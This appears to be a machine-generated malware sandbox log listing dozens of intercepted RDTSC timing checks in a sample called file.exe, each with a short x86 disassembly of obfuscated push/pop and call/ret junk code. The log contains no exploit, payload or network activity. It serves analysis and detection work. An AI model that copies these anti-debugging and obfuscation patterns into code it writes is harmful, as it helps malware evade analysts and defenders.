              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A116BA second address: A116DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jne 00007FF7B0C9CD46h 0x00000017 pop ecx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A116DD second address: A11724 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF7B0F3BFD4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ecx 0x0000000d jbe 00007FF7B0F3BFD9h 0x00000013 jmp 00007FF7B0F3BFD3h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jno 00007FF7B0F3BFCCh 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11724 second address: A1172F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF7B0C9CD46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1188B second address: A118AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A118AA second address: A118AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11B0C second address: A11B29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A122F7 second address: A12341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FF7B0C9CD48h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D2A1Eh] 0x00000028 nop 0x00000029 js 00007FF7B0C9CD53h 0x0000002f push eax 0x00000030 jmp 00007FF7B0C9CD4Bh 0x00000035 pop eax 0x00000036 push eax 0x00000037 push ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push ebx 0x0000003b pop ebx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A124E6 second address: A124F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FF7B0F3BFCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1280B second address: A12813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A12813 second address: A1282A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF7B0F3BFC6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FF7B0F3BFC6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1282A second address: A12830 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A12830 second address: A12835 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A12835 second address: A12844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 clc 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A12D7F second address: A12E0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007FF7B0F3BFD4h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FF7B0F3BFC8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007FF7B0F3BFC8h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 mov esi, dword ptr [ebp+122D17BFh] 0x0000004f xchg eax, ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FF7B0F3BFD6h 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A137BB second address: A137CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FF7B0C9CD46h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A137CB second address: A137CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A137CF second address: A137D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A152A7 second address: A1531C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FF7B0F3BFC8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov esi, dword ptr [ebp+122D3A69h] 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D26BBh] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007FF7B0F3BFC8h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c add esi, 23DE91C4h 0x00000052 xchg eax, ebx 0x00000053 jo 00007FF7B0F3BFDDh 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FF7B0F3BFCBh 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1500F second address: A1502F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FF7B0C9CD4Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1531C second address: A15336 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FF7B0F3BFCAh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A15336 second address: A1533A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1533A second address: A1533E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1650C second address: A16512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A16512 second address: A16516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CC84C second address: 9CC86E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD58h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1944B second address: A1944F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1944F second address: A194CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FF7B0C9CD48h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007FF7B0C9CD48h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ebp 0x00000045 call 00007FF7B0C9CD48h 0x0000004a pop ebp 0x0000004b mov dword ptr [esp+04h], ebp 0x0000004f add dword ptr [esp+04h], 0000001Ch 0x00000057 inc ebp 0x00000058 push ebp 0x00000059 ret 0x0000005a pop ebp 0x0000005b ret 0x0000005c xchg eax, ebx 0x0000005d push eax 0x0000005e push edx 0x0000005f push ecx 0x00000060 pushad 0x00000061 popad 0x00000062 pop ecx 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D2E5 second address: A1D302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7B0F3BFD9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E813 second address: A1E81D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF7B0C9CD4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D9E8 second address: A1DA0A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7B0F3BFCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d jnl 00007FF7B0F3BFC6h 0x00000013 pop esi 0x00000014 js 00007FF7B0F3BFCCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DAB6 second address: A1DABC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1EA66 second address: A1EA8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1EA8A second address: A1EA90 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1FA8C second address: A1FAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0F3BFD3h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1EA90 second address: A1EA9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF7B0C9CD46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23120 second address: A23124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22232 second address: A22238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23124 second address: A2315E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 cmc 0x00000008 push 00000000h 0x0000000a jo 00007FF7B0F3BFC8h 0x00000010 mov ebx, esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FF7B0F3BFC8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A241E4 second address: A241EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A232AE second address: A23335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+1246FEB9h], edi 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FF7B0F3BFC8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f jp 00007FF7B0F3BFCCh 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c movsx ebx, bx 0x0000003f mov eax, dword ptr [ebp+122D0859h] 0x00000045 mov edi, ebx 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007FF7B0F3BFC8h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 00000015h 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 or dword ptr [ebp+124643F6h], edi 0x00000069 nop 0x0000006a push eax 0x0000006b push edx 0x0000006c jo 00007FF7B0F3BFC8h 0x00000072 push edx 0x00000073 pop edx 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23335 second address: A2333F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7B0C9CD4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2333F second address: A23363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF7B0F3BFD9h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23363 second address: A23369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2500E second address: A2508B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007FF7B0F3BFC6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jno 00007FF7B0F3BFE0h 0x00000013 nop 0x00000014 mov dword ptr [ebp+122D2A00h], ebx 0x0000001a sub edi, dword ptr [ebp+122D3875h] 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007FF7B0F3BFC8h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c pushad 0x0000003d pushad 0x0000003e mov ah, BDh 0x00000040 and esi, dword ptr [ebp+122D3765h] 0x00000046 popad 0x00000047 mov esi, ebx 0x00000049 popad 0x0000004a push 00000000h 0x0000004c sub ebx, dword ptr [ebp+122D2A00h] 0x00000052 push eax 0x00000053 push esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push esi 0x00000057 pop esi 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25207 second address: A2520B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2520B second address: A25295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov di, 2F95h 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FF7B0F3BFC8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 mov eax, dword ptr [ebp+122D0371h] 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007FF7B0F3BFC8h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 00000014h 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 mov bx, ax 0x00000056 push FFFFFFFFh 0x00000058 mov dword ptr [ebp+122D2A00h], edi 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 jmp 00007FF7B0F3BFD8h 0x00000067 jl 00007FF7B0F3BFC6h 0x0000006d popad 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25295 second address: A2529B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2529B second address: A2529F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2529F second address: A252A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26231 second address: A26235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26235 second address: A2623B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2623B second address: A2623F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28F39 second address: A28F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28F3D second address: A28F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FF7B0F3BFC8h 0x0000000c push edi 0x0000000d jmp 00007FF7B0F3BFD3h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 jmp 00007FF7B0F3BFCCh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 pushad 0x00000024 jmp 00007FF7B0F3BFD9h 0x00000029 je 00007FF7B0F3BFC6h 0x0000002f popad 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2957D second address: A29601 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007FF7B0C9CD52h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FF7B0C9CD48h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push esi 0x00000029 cld 0x0000002a pop edi 0x0000002b push 00000000h 0x0000002d mov ebx, dword ptr [ebp+122D1C39h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FF7B0C9CD48h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f call 00007FF7B0C9CD4Bh 0x00000054 xor bx, C902h 0x00000059 pop edi 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d ja 00007FF7B0C9CD4Ch 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A56B second address: A2A570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A570 second address: A2A57A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF7B0C9CD46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B38F second address: A2B393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B393 second address: A2B3A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007FF7B0C9CD46h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B440 second address: A2B446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B446 second address: A2B457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FF7B0C9CD46h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B457 second address: A2B45B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B45B second address: A2B461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A67E second address: A2A726 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e adc ebx, 14ED5439h 0x00000014 mov edi, ecx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d pushad 0x0000001e jmp 00007FF7B0F3BFCDh 0x00000023 jc 00007FF7B0F3BFCCh 0x00000029 mov dword ptr [ebp+12450BD7h], ecx 0x0000002f popad 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 mov dword ptr [ebp+122D2940h], edx 0x0000003d mov eax, dword ptr [ebp+122D0889h] 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 call 00007FF7B0F3BFC8h 0x0000004b pop eax 0x0000004c mov dword ptr [esp+04h], eax 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc eax 0x00000059 push eax 0x0000005a ret 0x0000005b pop eax 0x0000005c ret 0x0000005d mov di, dx 0x00000060 push FFFFFFFFh 0x00000062 and ebx, dword ptr [ebp+122D1C60h] 0x00000068 nop 0x00000069 jo 00007FF7B0F3BFD0h 0x0000006f pushad 0x00000070 jns 00007FF7B0F3BFC6h 0x00000076 push edx 0x00000077 pop edx 0x00000078 popad 0x00000079 push eax 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007FF7B0F3BFD9h 0x00000082 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C45E second address: A2C4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF7B0C9CD4Ah 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jp 00007FF7B0C9CD46h 0x00000014 pop eax 0x00000015 push edi 0x00000016 jne 00007FF7B0C9CD46h 0x0000001c pop edi 0x0000001d popad 0x0000001e nop 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007FF7B0C9CD48h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 push 00000000h 0x0000003b jmp 00007FF7B0C9CD4Fh 0x00000040 push 00000000h 0x00000042 xchg eax, esi 0x00000043 jne 00007FF7B0C9CD5Ch 0x00000049 push eax 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C4DD second address: A2C4E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C63C second address: A2C640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
